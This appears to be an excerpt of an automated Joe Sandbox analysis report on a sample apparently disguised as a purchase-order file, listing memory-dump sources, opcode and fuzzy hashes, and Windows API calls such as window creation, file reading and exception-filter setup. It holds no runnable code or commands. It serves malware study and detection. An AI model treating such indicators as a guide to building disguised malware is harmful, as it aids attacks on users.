                                                                                                                                                                                                      • Instruction ID: e7333226adad16c5055dfbbb590e28277ed762d8782b21bd7734f9a6573964fa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 196a95de5c9a0d0b07e1a1c9e201b9c33cbb7d2a0780617c91a43e3abc117b76
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6C04CB1801109DFCB51DFC0C9449EEB7BCAB08305F1040969105F2150D7749B459B7B
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042818F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
                                                                                                                                                                                                      • Instruction ID: d9a2277a5669354ba61d9b8df2fcfec71eca91813c8554d43367222680a44f9d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4A0113000020CAB8F002B82EC088883F2CEA002A0B000030F80C000208B22A820AA8A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 127a6c3db9d60b98899cdc5ea04ee0c3ac002f17975fbaa1371f04cac1f26906
                                                                                                                                                                                                      • Instruction ID: b3972a61e6c98cdc44aff2fda56b5a97435894f6ee6f97fc63bde65413a132cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 127a6c3db9d60b98899cdc5ea04ee0c3ac002f17975fbaa1371f04cac1f26906
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F822D76B083108FD748DF19D89075EF7E2ABC8314F1A893DA999E3354DA74EC118B86
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 93e94864084da7dc6a0a311636128358bf8768a9b049c0509ff878851e86bc1d
                                                                                                                                                                                                      • Instruction ID: 3ea83085b7b7458a8ffaf32aed5b15ed110c5b3f8e0b93e4a02d71e9de294a1c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93e94864084da7dc6a0a311636128358bf8768a9b049c0509ff878851e86bc1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F1089288DBC15FD72397B04839142BFB06E6710574E8ADFC4E78A9A3E358A855D323
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ab677689509235062c671ede01f910996f2e7dabdbc9dfd99f3c530d78f3e847
                                                                                                                                                                                                      • Instruction ID: 142903332116bee3650d6b001f93b33e5340f42ce5176e0e90a273023e695ecd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab677689509235062c671ede01f910996f2e7dabdbc9dfd99f3c530d78f3e847
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A32F021E29F054DD7239635C826336A299AFB73D4F15D737F81AB6EA6EF28C4834140
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 724d9c71168ca458cb67a215e402b6cca7029dc2124992296b92838be04038cb
                                                                                                                                                                                                      • Instruction ID: c286300d99e2b91445e27a8d3dc9f2c346740fa195f4ecc71a48a56eb8d2d117
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724d9c71168ca458cb67a215e402b6cca7029dc2124992296b92838be04038cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD127170A002099BDF04DFA5DA81AEEB7F5FF48304F10852AE406F7291DB3AAD11CB59
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3728558374-0
                                                                                                                                                                                                      • Opcode ID: ed8691778596391a46cab7282665a90ddbbf5c8e5447e1fbb8c1f230885cfa06
                                                                                                                                                                                                      • Instruction ID: 51b8f2ae0ea6a7a2cdf14863a84620939d9b69a1a68befcef78454a7017468de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed8691778596391a46cab7282665a90ddbbf5c8e5447e1fbb8c1f230885cfa06
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5202D370A00205DBCF04DF65DA81AAEB7B5FF44304F10C07AE80AEB295EB79D955CB99
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                                                      • Instruction ID: 60745259864980ffaeeb8d0df3bf3fea5f6cb1ca8e1c1cebd13c90a26c2c7bac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32C1F6323051A30ADF2D8639943447FFAE15A917B171A036FD8B2CB6D2FF28C569D624
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                                                                                                                                                      • Instruction ID: 3e2df1470ec15f6de3fc02a1fec88fc0865cb15022bd8b9e7e66f3cf4b3ef954
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                                                      • Instruction ID: 44f5d9664e715192188212fdf678a4eee384f5bf2223b1db12e0b08a2e30af3f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67C1E4323052A309DF2D4639943443FBAE15AA27B170A036FD4B3CB6D6FF28C569D624
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                                                                                                                                                      • Instruction ID: 1af492327799843f9733e3b2486c3381ee7e0cce26e58b5207dc5620addfdcee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FA193B29093109FC344CF1AD88055BBBE2BFC8614F5AC96EF89897315D730E9458F8A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                                                                                                                                                      • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2c5f9f8afac8dba86c6d57009b3cb5d47ea7df5cf61bf8cd1437bc79fe4db5d5
                                                                                                                                                                                                      • Instruction ID: b11d8a742966ccaae8ad1f1d1b7eaf7909952427d739a7786324d33d2cd1095a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c5f9f8afac8dba86c6d57009b3cb5d47ea7df5cf61bf8cd1437bc79fe4db5d5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5611475A287A44BC312AF7DE8412BAB398FFE6384F44C73EEA8562651DB341106C304
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 4f3aed30a42e13c4a75e9fe00efa9d7510a9d3dacbe183bf7ec0b78647e89edc
                                                                                                                                                                                                      • Instruction ID: ebade3e3b653b6c4ad4a9029f1035b73c3fe35f95719bcb2c59fbf0a647b505c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f3aed30a42e13c4a75e9fe00efa9d7510a9d3dacbe183bf7ec0b78647e89edc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0241A1306083558FC728EF69E8E06BBB3D5FBC9315F65493ED6C683281CA386426CB51
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                                                                                                                                                      • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                                                                                                                                                      • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                      • Instruction ID: 976e304ee223d953fdc39443ce67f257d128b71e0244738a4644f29a76ed3997
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0741C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                      • Instruction ID: e4390c3b0d51ff6a913c70c8c9a8be96d2a273b88c7e98344289dbb5e45f3de1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D019674A00109EFCB48DF98C5909AEF7B6FB88310F208599E81997301D730AE41EB80
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                      • Instruction ID: 4d7665fb20c9c1803a6d64aaa1febf6452db8d27576f923ebcf9e174e688f649
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42019678A00109EFCB58DF98C5909AEF7B5FB48310F208599D815A7701D730AE51EB80
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0045A2FE
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0045A310
                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 0045A31E
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0045A338
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0045A33F
                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045A480
                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0045A490
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A4D8
                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0045A4E4
                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0045A51E
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A540
                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A553
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A55E
                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0045A567
                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A576
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0045A57F
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A586
                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0045A591
                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A5A3
                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0048D9BC,00000000), ref: 0045A5B9
                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0045A5C9
                                                                                                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0045A5EF
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0045A60E
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A630
                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A81D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
